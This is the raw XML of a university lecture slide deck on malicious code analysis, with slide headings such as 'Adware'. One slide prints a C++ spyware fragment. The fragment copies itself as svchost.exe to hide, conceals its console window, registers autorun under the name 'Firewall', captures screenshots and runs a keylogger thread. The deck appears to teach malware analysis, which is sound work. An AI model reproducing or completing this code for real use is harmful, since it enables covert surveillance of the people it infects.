Target="../tags/tag320.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag319.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag318.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag317.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag309.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag248.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag247.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag246.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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag254.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag253.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag252.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag251.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag250.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag249.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag240.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media/image12.png"/><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tags" Target="../tags/tag327.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag326.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tags" Target="../tags/tag329.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag328.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tags" Target="../tags/tag331.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag330.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag339.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag338.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag337.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag333.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag332.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag342.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag341.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag340.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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag262.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag261.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag264.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag263.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266.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag265.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268.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag270.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag272.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag274.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag273.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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag277.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag276.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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9" name="Google Shape;56;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="10504805" y="4194810"/>
            <a:ext cx="2939415" cy="4041775"/>
            <a:chOff x="-1006072" y="1271750"/>
            <a:chExt cx="4357952" cy="5991287"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Google Shape;57;p15"/>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1" name="Google Shape;58;p15"/>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2" name="Google Shape;59;p15"/>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3" name="Google Shape;60;p15"/>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4" name="Google Shape;61;p15"/>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5" name="Google Shape;62;p15"/>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6" name="Google Shape;63;p15"/>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7" name="Google Shape;64;p15"/>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8" name="Google Shape;65;p15"/>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9" name="Google Shape;66;p15"/>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0" name="Google Shape;67;p15"/>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1" name="Google Shape;68;p15"/>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2" name="Google Shape;69;p15"/>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3" name="Google Shape;70;p15"/>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4" name="Google Shape;71;p15"/>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5" name="Google Shape;72;p15"/>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6" name="Google Shape;73;p15"/>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7" name="Google Shape;74;p15"/>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8" name="Google Shape;75;p15"/>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9" name="Google Shape;76;p15"/>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0" name="Google Shape;77;p15"/>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1" name="Google Shape;78;p15"/>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2" name="Google Shape;79;p15"/>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3" name="Google Shape;80;p15"/>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4" name="Google Shape;81;p15"/>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5" name="Google Shape;82;p15"/>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6" name="Google Shape;83;p15"/>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7" name="Google Shape;84;p15"/>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8" name="Google Shape;85;p15"/>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9" name="Google Shape;86;p15"/>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0" name="Google Shape;87;p15"/>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1" name="Google Shape;88;p15"/>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2" name="Google Shape;89;p15"/>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3" name="Google Shape;90;p15"/>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4" name="Google Shape;91;p15"/>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5" name="Google Shape;92;p15"/>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6" name="Google Shape;93;p15"/>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7" name="Google Shape;94;p15"/>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8" name="Google Shape;95;p15"/>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9" name="Google Shape;96;p15"/>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0" name="Google Shape;97;p15"/>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1" name="Google Shape;98;p15"/>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2" name="Google Shape;99;p15"/>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3" name="Google Shape;100;p15"/>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4" name="Google Shape;101;p15"/>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5" name="Google Shape;102;p15"/>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6" name="Google Shape;103;p15"/>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7" name="Google Shape;104;p15"/>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8" name="Google Shape;105;p15"/>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9" name="Google Shape;106;p15"/>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0" name="Google Shape;107;p15"/>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1" name="Google Shape;108;p15"/>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2" name="Google Shape;109;p15"/>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3" name="Google Shape;110;p15"/>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4" name="Google Shape;111;p15"/>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5" name="Google Shape;112;p15"/>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6" name="Google Shape;113;p15"/>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7" name="Google Shape;114;p15"/>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8" name="Google Shape;115;p15"/>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9" name="Google Shape;116;p15"/>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0" name="Google Shape;117;p15"/>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1" name="Google Shape;118;p15"/>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2" name="Google Shape;119;p15"/>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3" name="Google Shape;120;p15"/>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4" name="Google Shape;121;p15"/>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5" name="Google Shape;122;p15"/>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6" name="Google Shape;123;p15"/>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7" name="Google Shape;124;p15"/>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8" name="Google Shape;125;p15"/>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9" name="Google Shape;126;p15"/>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0" name="Google Shape;127;p15"/>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1" name="Google Shape;128;p15"/>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2" name="Google Shape;129;p15"/>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3" name="Google Shape;130;p15"/>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4" name="Google Shape;131;p15"/>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5" name="Google Shape;132;p15"/>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6" name="Google Shape;133;p15"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="矩形 172"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9970770" y="109855"/>
            <a:ext cx="1960245"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rPr>
              <a:t>2023.10.05</a:t>
            </a:r>
            <a:endPar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11677571" y="6016506"/>
            <a:ext cx="247650" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;54;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731135" y="1773555"/>
            <a:ext cx="6729730" cy="209804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4000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>Malicious Code Analysis</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="299085" y="109855"/>
            <a:ext cx="1848142" cy="1296000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;55;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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591</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7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886710" y="5492115"/>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Gianforte School of Computing </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E-mail: fangtian.zhong@montana.edu</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example</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 name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329565" y="1035685"/>
            <a:ext cx="11532870" cy="9940290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>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if (_access("C:\\Users\\Public\\Public", 0)) {//exist?</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_mkdir("C:\\Users\\Public\\Public");</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if (_access("C:\\Users\\Public\\Public\\Screens", 0)) {</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_mkdir("C:\\Users\\Public\\Public\\Screens");</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string s = util.FindPath();</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wstring stemp = wstring(s.begin(), s.end());</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LPCWSTR path = stemp.c_str();</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CopyFile(path, L"C:\\Users\\Public\\Public\\svchost.exe", TRUE);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>//Copies an existing file to a new file in order to hide itself. </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string screen = "C:\\Users\\Public\\Public\\Screens\\screenshot.bmp";</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char* bmp = new char[screen.size() + 1];</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strcpy(bmp, screen.c_str());</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util.HideConsole();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>//hide the window</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//util.Autoload("hack.exe", util.FindPath());</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util.Autoload("Firewall", "C:\\Users\\Public\\Public\\svchost.exe")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>;//hide itself from firewall</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util.Screenshot(0, 0, 1920, 1080, (char*)(bmp), NULL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>;//screen shot</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thread logger(logger);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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thread screens(screens);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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if (logger.joinable())</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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logger.join();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>//finish its execution before continuing with the rest of the program</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if (screens.joinable())</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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screens.join();</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delete[] bmp;</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704259 " pathEditMode="relative" ptsTypes="">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0" y="0"/>
            <a:ext cx="12192635" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-2"/>
            <a:ext cx="12191998" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF">
              <a:alpha val="91765"/>
            </a:sysClr>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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278630" y="2934653"/>
            <a:ext cx="7913370" cy="988695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:sp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sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="09DEE9">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Adware</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="09DEE9">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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74E7442A-BA00-4274-AC47-95D95C23D1C8}" type="datetimeFigureOut">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="07A7AF">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7"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02</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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Part Two</a:t>
            </a:r>
            <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="L 形 9"/>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1" name="L 形 10"/>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2" name="L 形 11"/>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3" name="直角三角形 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="06DCA9">
                <a:lumMod val="5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14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426"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5" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4158103"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Adware</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="组合 33" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d220a7d0a"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132205" y="1593850"/>
            <a:ext cx="9927590" cy="4030980"/>
            <a:chOff x="1783" y="2050"/>
            <a:chExt cx="15634" cy="6348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1783" y="2050"/>
              <a:ext cx="15635" cy="6349"/>
              <a:chOff x="998510" y="1183843"/>
              <a:chExt cx="9928225" cy="4031615"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Freeform 215"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId1"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="998510" y="1333068"/>
                <a:ext cx="9928225" cy="3882390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1245 w 1301"/>
                  <a:gd name="T1" fmla="*/ 536 h 536"/>
                  <a:gd name="T2" fmla="*/ 56 w 1301"/>
                  <a:gd name="T3" fmla="*/ 536 h 536"/>
                  <a:gd name="T4" fmla="*/ 0 w 1301"/>
                  <a:gd name="T5" fmla="*/ 480 h 536"/>
                  <a:gd name="T6" fmla="*/ 0 w 1301"/>
                  <a:gd name="T7" fmla="*/ 56 h 536"/>
                  <a:gd name="T8" fmla="*/ 56 w 1301"/>
                  <a:gd name="T9" fmla="*/ 0 h 536"/>
                  <a:gd name="T10" fmla="*/ 119 w 1301"/>
                  <a:gd name="T11" fmla="*/ 0 h 536"/>
                  <a:gd name="T12" fmla="*/ 119 w 1301"/>
                  <a:gd name="T13" fmla="*/ 8 h 536"/>
                  <a:gd name="T14" fmla="*/ 56 w 1301"/>
                  <a:gd name="T15" fmla="*/ 8 h 536"/>
                  <a:gd name="T16" fmla="*/ 8 w 1301"/>
                  <a:gd name="T17" fmla="*/ 56 h 536"/>
                  <a:gd name="T18" fmla="*/ 8 w 1301"/>
                  <a:gd name="T19" fmla="*/ 480 h 536"/>
                  <a:gd name="T20" fmla="*/ 56 w 1301"/>
                  <a:gd name="T21" fmla="*/ 528 h 536"/>
                  <a:gd name="T22" fmla="*/ 1245 w 1301"/>
                  <a:gd name="T23" fmla="*/ 528 h 536"/>
                  <a:gd name="T24" fmla="*/ 1293 w 1301"/>
                  <a:gd name="T25" fmla="*/ 480 h 536"/>
                  <a:gd name="T26" fmla="*/ 1293 w 1301"/>
                  <a:gd name="T27" fmla="*/ 56 h 536"/>
                  <a:gd name="T28" fmla="*/ 1245 w 1301"/>
                  <a:gd name="T29" fmla="*/ 8 h 536"/>
                  <a:gd name="T30" fmla="*/ 354 w 1301"/>
                  <a:gd name="T31" fmla="*/ 8 h 536"/>
                  <a:gd name="T32" fmla="*/ 354 w 1301"/>
                  <a:gd name="T33" fmla="*/ 0 h 536"/>
                  <a:gd name="T34" fmla="*/ 1245 w 1301"/>
                  <a:gd name="T35" fmla="*/ 0 h 536"/>
                  <a:gd name="T36" fmla="*/ 1301 w 1301"/>
                  <a:gd name="T37" fmla="*/ 56 h 536"/>
                  <a:gd name="T38" fmla="*/ 1301 w 1301"/>
                  <a:gd name="T39" fmla="*/ 480 h 536"/>
                  <a:gd name="T40" fmla="*/ 1245 w 1301"/>
                  <a:gd name="T41" fmla="*/ 53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01" h="536">
                    <a:moveTo>
                      <a:pt x="1245" y="536"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="536"/>
                      <a:pt x="56" y="536"/>
                      <a:pt x="56" y="536"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="536"/>
                      <a:pt x="0" y="511"/>
                      <a:pt x="0" y="480"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="56"/>
                      <a:pt x="0" y="56"/>
                      <a:pt x="0" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="25"/>
                      <a:pt x="25" y="0"/>
                      <a:pt x="56" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="0"/>
                      <a:pt x="119" y="0"/>
                      <a:pt x="119" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="8"/>
                      <a:pt x="119" y="8"/>
                      <a:pt x="119" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="8"/>
                      <a:pt x="56" y="8"/>
                      <a:pt x="56" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="8"/>
                      <a:pt x="8" y="30"/>
                      <a:pt x="8" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="480"/>
                      <a:pt x="8" y="480"/>
                      <a:pt x="8" y="480"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="506"/>
                      <a:pt x="30" y="528"/>
                      <a:pt x="56" y="528"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1245" y="528"/>
                      <a:pt x="1245" y="528"/>
                      <a:pt x="1245" y="528"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1271" y="528"/>
                      <a:pt x="1293" y="506"/>
                      <a:pt x="1293" y="480"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1293" y="56"/>
                      <a:pt x="1293" y="56"/>
                      <a:pt x="1293" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1293" y="30"/>
                      <a:pt x="1271" y="8"/>
                      <a:pt x="1245" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="354" y="8"/>
                      <a:pt x="354" y="8"/>
                      <a:pt x="354" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="354" y="0"/>
                      <a:pt x="354" y="0"/>
                      <a:pt x="354" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1245" y="0"/>
                      <a:pt x="1245" y="0"/>
                      <a:pt x="1245" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1276" y="0"/>
                      <a:pt x="1301" y="25"/>
                      <a:pt x="1301" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1301" y="480"/>
                      <a:pt x="1301" y="480"/>
                      <a:pt x="1301" y="480"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1301" y="511"/>
                      <a:pt x="1276" y="536"/>
